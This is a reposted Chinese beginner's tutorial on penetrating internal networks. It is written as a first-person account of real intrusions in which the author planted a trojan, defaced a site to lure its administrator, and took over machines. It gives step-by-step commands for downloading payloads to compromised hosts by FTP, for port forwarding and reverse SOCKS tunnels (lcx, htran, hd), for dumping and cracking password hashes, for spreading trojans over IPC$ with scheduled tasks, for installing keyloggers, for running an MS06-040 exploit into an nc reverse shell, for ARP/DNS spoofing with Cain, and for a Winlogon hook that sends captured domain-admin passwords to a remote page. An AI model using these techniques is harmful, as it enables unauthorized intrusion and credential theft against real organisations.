精典详细内网渗透专题文章

内网渗透可以参考,但是还是没有创新的方法,可以供菜鸟们参考!!

 

(转贴)

 

经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图12所示。

如果有的朋友现在还不了解路由器和交换机等什么意思,那应该好好补习一下了。这里在说一下什么叫内网,可能有的朋友认192.168.1.x这样的 形式就是内网,前段时间QQ上一朋友挂出一台机器,告诉我有内网,我问他怎么判断的,他说执行ipconfig /all的时候看见内网地址了,其实这样判断太过草率,比如说我为了安全,我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网,其实我有内网吗?是没有的。

在渗透内网之前我们先来了解一下局域网常见的拓扑结构,网络中的计算机 等设备要实现互联,就需要以一定的结构方式进行连接,这种连接方式就叫做"拓扑结构",通俗地讲这些网络设备如何连接在一起的。目前常见的网络拓扑结构主 要有以下四大类:1、星型结构,2、环型结构,3、总线型结构,4、星型和总线型结合的复合型结构。因为文章是讨论渗透内网的,所以每种的详细介绍,我就 不列出来了,大家简单了解下就可以了,有兴趣的可以每一种都百度下。


可能刚入门的朋友不是很了解为什么内网而我们还能访问到呢,现在很多服务器都是用了硬件防火墙作的映射,也就是说他的所有服务器其实都在防火墙以后并且 没有外网IP,可能有人会说,没有外网IP那我们访问它网站用的IP是什么呢?如果使用硬件防火墙配置过这种环境过朋友就明白了,这是现在很多包括国内大 公司流行的NAT配置方法,这样相对来说比较安全,这样就需要我们在渗透的时候做端口映射。 

下面我把以前入侵渗透的几次内网过程并把一些思路,一些高手们的渗透经验,和一些用到或没用到的工具都综合的说一下。首先是通过脚本漏洞获得了一个 WEBSHELL,服务器开的端口有21和80,并没有开过多的端口,没有装SU,pcAnywhere等第三方软件,wscript.shell为真, 上传CMD能执行一些简单的命令,其他脚本木马权限一样,这台服务器上面就两个站,目录权限不是很严,发现D盘下有一个字符替换器,如3所示。

 

直接把下回本地看看是什么东东,原来是一个查找字符的工具,如4所示。

 

莫非这站以前让人搞过,管理员用来查找被改文件的,试了一下可以改名,如5,

 

那么好办了,我直接捆了一个木马在上面,把这个删掉,等着管理员上线吧,等了两天管理员还是没有上线,这么等下去也不是办法,只好把首页涂了,告诉他网站有漏洞,已被人植入木马,请查找木马之类的,并修改了几个重要文件的时间,果然管理员上线了。如6。

 

执行ipconfig /all果然有内网IP,7。

 

既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具, 都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也 可以在本机架FTP服务器,用到20cn的FTP服务器,8。

 

设置好用户和密码后cmdshell里执行:

echo o 你架设FTP的IP>ftp.txt
echo hacklu>>ftp.txt       //写入ftp.txt用户名
echo 123456>>ftp.txt      //写入ftp.txt密码
echo bin>>ftp.txt       //二进制方式转输
echo get 11.exe>>ftp.txt   //将11.exe下载到肉鸡
echo bye>>ftp.txt      //断开FTP
type ftp.txt        //查看写入是否有错误 
ftp -s:ftp.txt              //执行FTP.TXT里的内容
del ftp.txt          //删除ftp.txt

这样我们就可以把11.exe下载到肉鸡运行就可以了,也可以用0803期杂志提到的VBS工具,适合不超过300KB的程序。把EXE转成BAT在上传,工具运行好会自动判断是2000系统或者2003系统,2000系统则自己重启,也可以自定义终端端口,运行结果如9所示。

 

在执行netstat -an发现3389开放,当然这样直接连是连接不上的,因为我们外界是无法直接访问到内部机器的,但可以让内网机器来访问我们,比如现在流行的反弹木马, 这样就需要我们做端口映射,说到端口映射工具当然代表作就是LCX写的工具了,首先在本机执行lcx -listen 99 9833,在肉鸡上执行lcx -slave 123.114.120.115 127.0.0.1 99 3389,意思是在本机监听99和9833端口,把99端口数据转到9833上面,然后把肉鸡的3389端口数据转到本机的99端口上,然后就可以拿连接 器连接本地的9833端口了,如图10所示。
 

而奇怪的是这次却没有连上,那就用下教主的高级内网渗透工具Paris,工具其他功能不多说了,只说下端口映射的功能,传msxidc和 vVXDc.dll到目标内网机器,在目标机器执行:msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22,在自己机器或者有公网IP的肉鸡:MAPServer.EXE -p22,这时候只要连接本机的或者公网IP肉鸡的22端口就可以了,在说一款比较不错的工具,htran.exe,能开启Socks5服务,但我们只说 端口映射,命令:在公网肉鸡监听(临听任意两个端口):htran -p -listen 119 120,在内网的机器执行:htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389,这样是把这个内网肉鸡的3389转发到公网肉鸡或者自己机器的119端口上,然后再用3389登陆器连接公网肉鸡的120端口。或者连接本机的 120端口,如图11所示。

 

这几款工具各有优势,大家在渗透的时候根据需要自己选择吧。

端口映射大家在渗透的时候可能已经不少朋友用过了,但很少看到有人是直接反弹代理来连接,反弹socks代理好处是我们直接可以连接内网的其它机器,而不需要在去转端口。最近“凋凌玫瑰”写了一个内网渗透利器---hd,使用方法如下,首先在本机监听:

c:/>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......

此命令是将连接进来的53端口的数据包连接到1180端口。

在对方机器上运行:

C:/RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!

上面的x.x.x.x为你的外网ip,这时我们接收到反弹回来的代理显示的情况。如图12。

 

然后在本机设置sockscap,设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去登录管理。如图13,14所示。






进了3389后我们第一步需要干什么?可能很多朋友都是留后门,像什么上帝之门、SHIFT后门,记录3389帐号等等。当然留什么后门好不在本文讨论 之中。我个人比较喜欢抓HASH(哈希),一般是pwdump+lc5,一般我破解的时候数字加字母的10位组合在3个小时左右就可以破得出来,而且现在 还有破解HASH的彩虹表,不过体积是很庞大的,在有前段时间在网上看见一篇文章,文章名字是“卸载补丁去除保护 获取Windows 2003密码”,大致意思是卸载Windows2003 SP1/SP2,因为windows 2003 +SP0才可以利用findpass从winlogin进程中抓出系统账号明文密码,抓出密码在重安装上补丁。我个人没有实验过,此方法很暴力,我个人也 不推荐这么做,很容易被发现的。


那什么是HASH呢?Hash简单点讲就是把任意一段数据经过某种算法生成一段唯一的固定长 度的数据。Hash,一般翻译做"散列",也有直接音译为"哈希"的,通过散列算法,变换成固定长度的输出,该输出就是散列值。HASH主要用于信息安全 领域中加密算法,他把一些不同长度的信息转化成杂乱的128位的编码里,叫做HASH值. 也可以说,hash就是找到一种数据内容和数据存放地址之间的映射关系。对于哈希菜鸟也可以这么理解,即保存电脑上管理员登录的一种加密后的密码,至于什 么详细加密算法,有兴趣的朋友可以百度下,例如我这里用的是SAMInside抓HASH,程序打开后我们选择小人这里,点击使用LSASS输入本地用 户,如图15。

 

这样计算机的用户名和HASH值就会出现在列表里,如图16。

 

直接点右上方的开始就可以破解密码了,图17所示,

 

也可以导出用LC5破解,在选择--文件--输出用户到PWDUMP,这样把HASH保存为文件文件,图18。

 

也可以用PWDUMP抓,如图19,

 

最后我们把内容复制下来保存文本文件用LC5破解,LC5的安装非常的简单,一直下一步即可。程序自己带注册机,我们在注册一下,完事后我们在程序 主页面导入刚才保存的hash.txt,点击导入按钮(第六个),在选择从PWDUMP文件,用户列表就会显示出来了,在点击开始就可以破解了,如图20,21所示。







而对于2000的系统我们直接可以用MT读出密码,直接运行mt -findpass,如22所示

 

,为什么要破解本机密码,因为在内网渗透的过程中抓出一台管理员的密码是很重要的,现在我们有了内网一台机器了,当然要继续渗透下去,在这里我总结 一下几种方法,方法一、扫描弱口令,ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗,DNS欺骗。方 法五、域结构下的渗透。这里简单的总结五方面,但是每一方面具体利用起来又包括很细节在里面。

方法一、扫描弱口令,ipc$连接。

可以用XScan-v3.3扫描器扫一下内网,设置好IP和端口,端口设置可以查看本机装有什么软件,例如本机装有radmin,pcAnywhere等等,那我们就扫描4899,5631等端口,如23,

 

然后用本机的知道的密码去连接。当然如果改成别的端口我们根据情况转换一下,有的时候在外网的机器很坚固,到了内网的时候就很脆弱了。当然现在机器 已经很少弱口令了,但是我们有本机管理员帐户和密码,管理员为了方便往往都设置成一样的,因为做系统的时候做完一台直接GHOST别的系统。而ipc$连 接可以是说是非常古老和经典的。

IPC 是Internet Process Connection的缩写,也就是远程网络连接。WindowsNT/2000/XP/2003默认都提供了IPC$管道连接,就是在两个计算机进程之 间建立通信连接。打个比方,IPC连接就像是挖好的地道,程序可通过地道访问远程主机。默认情况下,IPC是共享的,也就是说微软已经为我们挖好了这个地 道(IPC),因此,这种基于IPC的入侵也常常被简称为IPC入侵。 IPC 后面的$是共享的意思,不过是隐藏的共享,微软系统中用“$”表示隐藏的共享,比如C$就是隐藏的共享C盘。也就是说C盘是共享的。ipc$连接这个只能 说是管理员开的共享,严格来说不能算一个漏洞,目标主机还需满足两个条件:1、目标主机开启了ipc$共享 ;2、拥有目标主机的管理员帐号和密码 。 当年在2000系统的时候ipc$入侵可以说是风扉一时。

这里我用两台XP做演示,打开命令提示符在CMD下输入:net use //IP/ipc$ "password" /user:"username" 建立非空连接,接着copy /路径/*.exe //IP/共享目录名,向远程主机复制文件,接着net time //IP,查看远程主机的当前时间,图24所示

 

,接着就可以用计划任务运行我们COPY过去的程序了,执行at //ip 时间 程序名,远程添加计划任务,图25所示。

 

可以按照我们规定的时间内运行程序,如果对方禁止了计划任务,默认是开启的,我们可以把文件复制到对方启动目录,先执行net use z: //IP/c$,是把对方C盘映射到本机Z盘上,这样我们直接将木马放在启动目录,如图26所示。

 

等复制完了想断开了可以用命令,net use z: /del /y,这样可以删除映射的z盘 如果有朋友也手工输入命令麻烦,也可以用20CN的IPC扫描器,可以同步植入木马。如27所示。

 

在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。后面会介绍域环境下的渗透。


方法二、靠自己的运气和管理员的懒惰加社会工程学。(推荐非安全出的黑客社会工程学攻击一书)

这里所说的运气是刚才说过的,比如说管理员为了方便设置“密码一卡通”扫描内网开3389端口的机器,用破出来的本机密码连接所有开3389的机器,我 曾经入侵一个台湾的内网就是密码都是一样的,或者可以在本机装上键盘记录,安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信 箱,WEB网页密码等等,这样也可以得到管理员的很多信息。

这里我用的是键盘记录大师,首先运行keyboardlog.exe,然后点"开起监控",注意这个程序只要运行一次就可以了,以后开机的时候自动运行。程序运行后如图28的界面,

 

我们点击开始监控就可以了。这个工具可以记录中文,这点对于有些机器还是不错的,记录的文件可以设置,方法为修改config.ini里的文件. 格式为如 c:/1111.txt,然后再运行keyboardlog.exe,点击停止监控,然后再重新点开始监控。如29是记录到的内容。

 

至于记录的什么内容就要靠大家去分析然后配合社会工程学了。


方法三、内网溢出。

溢出从技术角度可 以分为堆溢出和栈溢出,这点我们先不说,从另一个角度则分为远程(remote)溢出和本地(local)溢出,远程溢出也就是通过对方的一些网络上的服 务对我们提交的的数据没有严格的检查,我们提交一些精心构造的数据,可以迫使对方的主机执行我们指定的动作:比如添加用户,打开端口,反弹一个SHELL 给我们等等。

这种方法放在现在来说可以说是成功率很低的,因为现在基本都是自己打补丁了,如果在向后退个二三年还是可以的,但并不代 表没有一点不可能,06的时候朽木在腾讯内网的时候就是靠嗅域管理员的哈希和MS06035溢出其他的机器,对于比较火的05年的MS05039,06年 的MS06035、06040,07年DNS溢出等等,这就需要我们多关注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微软漏洞发布的地方,当然内网溢出不一定非得靠系统漏洞,可以查看本机装有那些第三方程序,然后溢出其他机器的,这里我以06040+2000系统为例,首先我们用Superscan3.0扫描内网开放445端口,如30所示。

 

在本机用NC监听1234端口,执行nc -l -v -p 1234,如31,

 

然后用另一个CMD窗口执行,ms06040rpc 对方IP 本机IP 1234 1,这样用NC监听的端口会返回了对方的CMDSHELL,如32、33所示。



在得到CMDSHELL之后,是添加用户或者给机器中木马,就看见大家爱好了。另外也可以用去年比较火的DNS溢出,DNS服务一般开放53端口。DNS服务器在有的时候就是域服务器,关于域环境下参考方法五。





方法四、arp欺骗,DNS欺骗。

这个方法是比较实用,所以多介绍一下。但同是也是比较容易暴露自己的,不少同行在C段方面和内网方面用的都是ARP欺骗,不少菜菜可能还记得杂志经常看到嗅探的时候用到的ARP欺骗,我们再来复习一下吧。首先在内网机器输入arp -a,如34所示。

 

这里第一列显示的是ip地址,第二列显示的是和ip地址对应的网络接口卡的硬件地址(MAC),第三列是该ip和mac的对应关系类型。可 见,arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议,或者说ARP协议是一种将ip地址转化成MAC地址的一种协议。它靠维持在内存中保 存的一张表来使ip得以在网络上被目标机器应答。

1、什么是MAC地址、MAC地址也叫物理地址,硬件地址或链路地址,同网络设备制造商 生产时写在硬件内部。IP地址与MAC地址在计算机里都是以二进制表示的。IP地址是32位的,而MAC地址则是48位的。MAC地址的长度为48位(6 个字节),通常表示为12个16进制数,每2个16进制之间用冒号隔开,如08:00:20:0A:8C:6D就是一个MAC地址,其中前3位16进制数 08:00:20代表网络硬件制造商的编号,它由IEEE(电子与电子工程师协会)分配,而后3位16进制数0A:8C:6D代表该制造商所制造的某个网 络产品(如网卡)的系列号。输入ipconfig /all就可以看见本机的MAC地址。

2、什么是ARP,大家都知道计算机通信是要有 IP地址的吧!可是在局域网中,计算机之间的通信是只靠MAC地址来发送数据的。ARP是一种协议,用来实现IP地址到MAC地址的转换,假设 192.168.1.1要发一个数据给192.168.1.101,它就会发出ARP广播包问:“谁是192.168.1.101?我要你的MAC地 址!”这时候192.168.1.101会回答:“我是192.168.1.101,我的MAC是AA-AA-AA-AA-AA-AA。”然后 192.168.1.1就会把这个回答记录下来,然后再发数据给192.168.1.101的时候就直接构造目地地址为AA-AA-AA-AA-AA- AA的数据包发送。

3、什么是ARP欺骗、经过刚才的ARP查询的过程我们知道,在询问的过程中,国为不知道到底谁才是 192.168.1.101,所以192.168.1.1发出的是广播包来询问,其它的电话虽然也收到了这个包但是并不回答。假如现在有个 人,192.168.1.102居心不良,想冒充192.168.1.101,他也可以给192.168.1.1发一个回答的数据包说:“我才是 192.168.1.101,我的MAC地址是BB-BB-BB-BB-BB。”那么192.168.1.1就会把原先的那条记录从MAC地址表中删除 掉,写入新的这个地址对应关系,这就是ARP欺骗。

4、什么是网关、在局域网中,所有的电脑可能是共用一个网络出口,这个出口就是网关 了。网关可以是一台电脑,也可以是一个路由器的某个接口,它一样有自己的IP地址,局域网中所有的要发到外部的数据包都直接递交给网关,网关负责将这个数 据包传递到远程网络,再将外界返回的数据分发给局域网中的指定电脑。



TCP/IP协议是如此的脆弱,ARP协议在 设计的当初并没有充分的考虑到安全问题,所以今天才出现N多的ARP欺骗工具,在介绍工具之前,我们再来谈谈服务器在机房中的情况。一般而言,现在流行的 的主机托管方式置放的服务器是和很多别的服务器放在一个机柜上,大家共用一个交换机共享100M的带宽,这样就造成了一个问题,那些没有做端口隔离的的机 房(绝大多数机房都是这样的)每个交换机下的所有服务器构成一个局域网。在这个局域网下,大家就可以玩ARP欺骗了。

说到ARP嗅探的工具要先提一下有一定的位置的cain,官方最新版为4.918,我们先要进行安装,如图35所示。

 

直接NEXT下一步就可以了,安装好我们运行CAIN,点击Sniffer,在选择工具栏第二个按钮,在点击十字架,在弹出对话框中我们选择子网中所有计算机,如36所示。

 

在Configure选项里我们可以根据需要选择端口,如21、80、3389等。如37所示。

 

这时在选择下面的ARP,十字按钮是灰色的,我们点击一下空白处,在选择十字按钮,在弹出的对话框里左边选择网关,右边选择欺骗的IP。最后点开始嗅探,上面第二个按钮。如38所示。

 

这样就能嗅到数据了,39是嗅到的HTTP密码。

 

另外如果嗅到了3389密码我们在上面打开文档,在里面可以找到密码,如40所示。

 
 

大家在用CAIN嗅探的时候可能遇到过这样的情况,数据一大就当机了,过了很少时间都连不上了,所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。 这样会大大的减少当机的可能性。如果看到丢包率超过10%就要注意啦,赶紧停掉,看看那里没设置好吧。另外提供一个“chong”写的BAT程序,在开嗅 的时候运行它就可以了。

======start=========
:ping
ping g.cn
IF ERRORLEVEL   1 GOTO reboot
IF ERRORLEVEL   0 GOTO ping
:reboot
iisreset /reboot
======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 (事先自己先测试下)。

在说下DSN欺骗,我们看下DNS是怎样工作的,DNS是全称是Domain Name Server,既域名服务器。当一台主机发送一个请求要求解析某个域名时,他会首先把解析请求发到自己的DNS服务器上。如果内网里的192.168.1.101要访问百度www.baidu.com,但不知道其IP地址,这时192.168.1.101主机询问网关192.168.1.1,www.baidu.com的IP是多少,如果这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页木马的IP,这样就实现了DNS域名欺骗。



首先用前面的介绍的列出内网机器,然后在ARP里选择ARP-DNS,点击空白处激活十字按钮,弹出一个DNS欺骗对话框,在请求DNS域名栏中填入对方要访问的网站,如www.baidu.com,然后在用来改写响应的IP地栏,如图41所示。

 

而我们响应的地址可以是一个网页木马的地址,这里我以网关为例,也就是说192.168.1.101访问www.baidu.com的时候会转向192.168.1.1的页面,我们先来访问一下192.168.1.1,如图42所示,

 

我们在192.168.1.104的机器上装CAIN开始DSN欺骗后访问百度网页,如图43所示。

 

是不是也和192.168.1.1一样了,如果我们在本架设一个HTTP服务器,挂上一个网马后,就能欺骗访问者了,当然如果想做的更像,可以制作一个和欺骗主页一样的页面。




方法五、域结构下的渗透。

在入侵域结构内网之前我们先来了解一下什么是域,可能大家对工作组比较熟悉了,而域和工作组是不一样的,工作组是一群计算机的集合,它仅仅是一个逻辑的 集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要到被访问计算机上来实现用户验证的。而域不同,域是一个有安全边界的计算机集合,在同一个 域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可了。也就是域用户登录,超级大的权限。而域还可以扩展,像域树, 域林。在一个网络中既可以有多个多级子域、域树,还可以有多个林。

为了大家好理解,我这里举个例子,例如一个内网是一个大楼,而每层的每个房间是一台计算机,当然每个房间的钥匙只有房间的主人才拥有,但大楼建立一个保安 室,而这保安室为了管理方便有一把可以打开任意房间的钥匙。前题是这个房间允许加入保安的管理范围内,这个保安室就是域控制器,当然在形象的说大楼可以是 10层,而每一层都有一个保安室,也可以有一个总的保安室。当然在往大的说也可以有很多大楼,大楼与大楼之间为了方便也可以建立共享。如活动目录的域,活 动目录可以贯穿一个或多个域。在独立的计算机上,域即指计算机本身,一个域可以分布在多个物理位置上,同时一个物理位置又可以划分不同网段为不同的域,每 个域都有自己的安全策略以及它与其他域的信任关系。当多个域通过信任关系连接起来之后,活动目录可以被多个信任域域共享。在往回说每台机器像一个树叶,而 我们控制了树叶,还想控制树杈,而最后还想控制这个大树,这时候就到域根了。而一棵树是在一片森林当中的。

在入侵内网的时候,一般先用net view查看内网的情况,列出共享的域、计算机或资源的列表。如图44所示。

 

如何判断有没有域呢,其实一个ipconfig /all基本就看出来了,大家在回到7当中,注意一下第二项,也就是Primary Dns Suffix这项,从这个命令我们可以得知,存在一个域xxxx-cc.com,我们ping一下域xxxx-cc.com,得到域服务器的ip。如45所示。

 

或者用命令net config workstation,会显示本机计算机名和管理员用户名,工作站的域DNS名称及登录到的域,如46所示。

 

接着执行net localgroup administrators来看一下本机在域里面的角色,如47所示。

 

看来只是一个普通域用户。我们再来查看一下域里面有多少的用户,执行net user /domain,域里面的用户很多,如48所示。

 

域里面这么多用户,那么我们再查看一下域管理员有哪些,执行net group "domain admins" /domain,貌似只有一个域管理员。如49所示。

 

大家知道在域管理网络中只要搞定了域管理员内网一切机器都OK了,现在域服务器有了,域管理员有了。思路呢?可以用上面的几种方法来入侵域服务器,如 ARP嗅探域服务器,而域管理器在很多时候也是DNS服务器,也可以尝试DNS溢出等。这里我为大家推荐一个Winlogon劫持记录3389密码小工 具,原作者为“lovemfc”,我们用这个不是记录本机登录的3389密码,当然本机也是可以记录的,更不错的是可以记录域管理员登录本机的密码,因为 域管理员是有权限登录下面每台用户的机器的。缺点是记录密码的东西只能保存本机上,而ASM根据这个写了一个发信版的生成器,这就方便我们大家了,程序运 行后如图50

 

选择好接受的ASP地址后,生成出来CreateServer.exe,直接在服务器上运行即可,post.asp会在你的URL地址下生成key.txt。适用范围2003系统,51是我记录到本机管理员和域管理员的密码

 

,这下就可以纵横整个内网了。在服务器上扫描开放3389端口的,用域管理员登录全部OK,在域控的环境中,我们只要得到域控密码也可以直接用ipc连接管理员机器种马。最后登录内网几台机器抓纪念一下,如52。

 

最后说一下本文章只做菜鸟渗透入门文章,当然内网渗透还有其他深入的技巧,如主动会话劫持等,因本人时间和水平都有限,文章中不足之处欢迎大家批评指正。菜菜朋友们在文章中如有问题联系我可以去非安全官方网站,ID:樱花浪子。

你可能感兴趣的:(精典详细内网渗透专题文章)